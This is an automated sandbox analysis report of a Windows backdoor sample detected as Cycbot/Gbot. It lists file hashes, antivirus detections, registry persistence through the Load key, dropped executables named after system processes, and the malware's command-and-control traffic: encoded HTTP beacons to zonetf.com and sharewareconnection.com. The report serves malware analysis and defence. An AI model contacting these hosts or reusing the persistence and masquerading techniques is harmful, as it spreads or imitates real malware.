Analysis Date: 2014-10-09 13:30:19
MD5: 9323bd893cbd2f113359a26b8c1a8ea3
SHA1: b851bd47eb817cc23cfcf935f2bb088e6b276844

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 30c6c39418be8d2c2b1711b1838a53e1 sha1: 42f35b905e4e17ad9f1fe4ca6e53db9504667317 size: 169984
Section: .rdata md5: 69dbfb0d25bf34419fe8b22ca9d6efe3 sha1: 79005de239f00f97e0e64f7840b361489439f8a0 size: 3584
Section: .data md5: c9321aa0c7066032c9b0a527943bbb3c sha1: d78d038c6b4c130711164385b3b447730562480d size: 19456
Section: .crt md5: 04e1735ee6621e2b3a336221e0bf9514 sha1: 857e24dd7644d2ec3d421815cd64da126790305d size: 512
Timestamp: 2005-11-07 01:02:41
Version: PrivateBuild: 1051
PEhash: 708c3fb3f88ed0694b6381d70e1d85b4dba3658e
IMPhash: bee17e79f4f158dbea4e7ec90c73ea50
AV 360 Safe: Gen:Trojan.Heur.KS.1
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.E.gen!Eldorado
AV Avira (antivir): BDS/Gbot.qt.457
AV CA (E-Trust Ino): Win32/Gbot.A!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Gbot-816
AV Dr. Web: BackDoor.Gbot.2442
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Cycbot.AD
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.E.gen!Eldorado
AV F-Secure: Gen:Trojan.Heur.KS.1
AV Grisoft (avg): Cryptic.CAM
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.qt
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.h
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): no_virus
AV Norman: winpe/Cycbot.BH
AV Rising: Trojan.Win32.Generic.1273C660
AV Sophos: Mal/FakeAV-IS
AV Symantec: Trojan.Gen.2
AV Trend Micro: BKDR_CYCBOT.SMIB
AV VirusBlokAda (vba32): Backdoor.Gbot
AV Yara APT: no_virus
AV Zillya!: Backdoor.Gbot.Win32.1319

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: bigspiderwomen.com
Winsock DNS: smallspiderwomen.com
Winsock DNS: 127.0.0.1
Winsock DNS: sharewareconnection.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: sharewareconnection.com (Type: A) ➝ 216.240.159.81
DNS: zonetf.com (Type: A) ➝ 141.8.225.80
DNS: smallspiderwomen.com (Type: A)
DNS: bigspiderwomen.com (Type: A)
HTTP GET: http://sharewareconnection.com/images/ubar_1.jpg?tq=gP4aKydXft8Xhg9H30Fqg5xyf7vraX53ANc6uX%2BWU5faTaf2qSBzSEugmu9QH%2BxC%2FnDhk1iuAd56uZwYHz1S%2Ff8bJNEFC%2Fd0MYnT52cFsCRf6G4UW%2BqwuxjKQBOzRCE0vIP41EzFfQvx%2FIASfcn2ojsUDyjD9uuqweD4gEvVjubYFIP6q00K1dejpHJbOrj%2BXDL7BhZc%2BEe8Ttt0%2FvaWdGBeLpKlMjsYrewphB4E57%2FFygiol1gAoGesxAuI%2F7Qg1Y5qIMU0c7HbqJ3%2BltOydH83jz7rueY%2B9Yvm%2Br2Uvr8mDPzeH%2FtTFujmpq74iyKaLHYFLFkM60oOFbfwTUDLombhKO1WjfxdnN%2Fw2EoEE%2BT83UBdQUbCOVtQPHyt5OStYRpNJNKkWwEWijjLIn6f%2FjgcB85lsn3zo7gGKLRU4yDGOvNjBzqMC59rlWSmDRnYd0rBCjF8ytYyDhFOEjyxh%2FKmG8FYH1qCAkSo4AuFMJMEJhVyZdb0icR1rXbjA6JbYydh2IVVNtlinWF5HJr%2BO4aBbPbv2JLKvHVWCjBV%2BC
User-Agent: iamx/3.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNwlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 216.240.159.81:80
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap


Strings